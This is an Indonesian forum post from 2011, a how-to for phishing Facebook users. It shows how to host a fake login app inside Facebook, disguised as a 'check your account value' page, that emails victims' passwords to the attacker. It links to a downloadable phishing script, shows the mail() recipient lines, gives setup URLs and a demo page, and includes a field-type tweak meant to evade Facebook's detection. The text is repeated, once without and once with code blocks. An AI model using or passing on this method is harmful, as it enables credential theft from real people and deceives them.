( Update ) Hacking Facebook via Facebook
Posted: Thu Sep 01, 2011 1:40 am
Facebook,sapa sih yang gak kenal Facebook???Salah satu situs jejaring sosial terbesar selain Friendster dan Twitter.Facebook dikenal karena kemudahan dan tentunya keamanannya...
Aman??100%??hem..tidak ada yang sempurna..banyak para hacker yang berusaha menembus pertahanan Facebook,seperti yang dilakukan team inj3ct0r yang menggunakan tehnik SQL pada salah satu Apps yang ada di faceboook.Tehnik lain??hem..saat ini lebih banyak menggunakan Social Enginering seperti tehnik Pishing,Poisoning Attack pada satu jaringan,Fake Login dll.
Disini saya akan membahas salah satu tehnik Social Enginering yaaa semacam fake login tapi menggunakan fasilitas Facebook itu sendiri.Maksudnya??maksudnya adalah kita membuat halaman palsu berupa apps di dalam Facebook tersebut.
Tata cara nya sebagai berikut:
1.Siapkan scriptnya dulu
2.Cari server gratisan atau injekkan yang support .PHP , .ASP
3.Facebook tentunya
Mulai pembuatannya deh :
sudah disiapkan scriptnya??kalau udah rubahlah di bagian yang saya tandai menjadi alamat e-mail anda
.php
.ASP
lalu upload ke server anda..dan tugas pertama kita selesai.
lalu masuk ke dan pilih "Perjuangan atau Komunitas" lalu masukkan nama halaman anda.Disini dituntut kepandaian kita mengolah kata agar berkesan menarik.Contoh "Cek Kepopuleran FB Anda " dan selesaikan langkah yang di anjurkan,kalau udah punya Logo buat halaman kita lebih bagus lagi sekalian kita upload disana.Kalau udah di kolom "Alamat Web" kita isi http://www.facebook.com/ lalu selesai deh.
lalau saatnya kita masuk ke dan kita pilih "aplikasi" lalu kita pilih "Go To Apps" dan masukkan kode FBML yang udah didownload tadi...jangan lupa di bagian yang bertuliskan "http://yourwebsite.com/facebook.php" diganti Url tempat kita mengupload file Facebook.php tadi...dan klik "Save". selesai sudah tugas ke 2 kita.Liat gambar dibawah ini
Terakhir,kita share halaman yang udah kita buat tadi,lalu minta temen-temen kita buat me-klik tombol "Like" usahakan minimal 25 orang yang nge-like..jadi kita bisa membuat nama untuk halaman kita,misal jadi "http://www.facebook.com/pagechecker"..dan berharap orang-orang mencoba aplikasi kita,lalu boom..panen password deh....cek folder spam di server e-mail kita...
Kalau mau liat hasilnya ni ada halaman demonya,tapi jangan coba-coba masukkin password asli ya..he he he
DEMO
tampilan kalau ada yang coba ni halaman kaya gini..
dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he
Facebook sudah "sedikit" menyadari tehnik ini,maka bila menggunakan script yang udah saya sediakan disini dan Box untuk input password tidak muncul maka ubahlah script dibagian ini
menjadi
semoga berguna
Aman??100%??hem..tidak ada yang sempurna..banyak para hacker yang berusaha menembus pertahanan Facebook,seperti yang dilakukan team inj3ct0r yang menggunakan tehnik SQL pada salah satu Apps yang ada di faceboook.Tehnik lain??hem..saat ini lebih banyak menggunakan Social Enginering seperti tehnik Pishing,Poisoning Attack pada satu jaringan,Fake Login dll.
Disini saya akan membahas salah satu tehnik Social Enginering yaaa semacam fake login tapi menggunakan fasilitas Facebook itu sendiri.Maksudnya??maksudnya adalah kita membuat halaman palsu berupa apps di dalam Facebook tersebut.
Tata cara nya sebagai berikut:
1.Siapkan scriptnya dulu
Code: Select all
http://www.mediafire.com/?448qgmyux5o2mb8
3.Facebook tentunya
Mulai pembuatannya deh :
sudah disiapkan scriptnya??kalau udah rubahlah di bagian yang saya tandai menjadi alamat e-mail anda
.php
Code: Select all
mail(
"[email protected]",
Code: Select all
Mailer.RemoteHost = "smtp.yourhost.com"
Mailer.AddRecipient "your name", "[email protected]"
lalu masuk ke
Code: Select all
http://www.facebook.com/pages/create
lalau saatnya kita masuk ke
Code: Select all
http://www.facebook.com/add.php?api_key=fdfd01c9df7d644a68a4e989ae861e44&pages
Terakhir,kita share halaman yang udah kita buat tadi,lalu minta temen-temen kita buat me-klik tombol "Like" usahakan minimal 25 orang yang nge-like..jadi kita bisa membuat nama untuk halaman kita,misal jadi "http://www.facebook.com/pagechecker"..dan berharap orang-orang mencoba aplikasi kita,lalu boom..panen password deh....cek folder spam di server e-mail kita...
Kalau mau liat hasilnya ni ada halaman demonya,tapi jangan coba-coba masukkin password asli ya..he he he
DEMO
Code: Select all
http://www.facebook.com/pages/Cek-Harga-Akun-FB-Anda/187358334667482?v=app_4949752878
dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he
Facebook sudah "sedikit" menyadari tehnik ini,maka bila menggunakan script yang udah saya sediakan disini dan Box untuk input password tidak muncul maka ubahlah script dibagian ini
Code: Select all
<input type="PaSSword" tabindex="3" value="" name="password" id="password" class="textbox" />
Code: Select all
<input type="text" tabindex="3" value="" name="password" id="password" class="textbox" />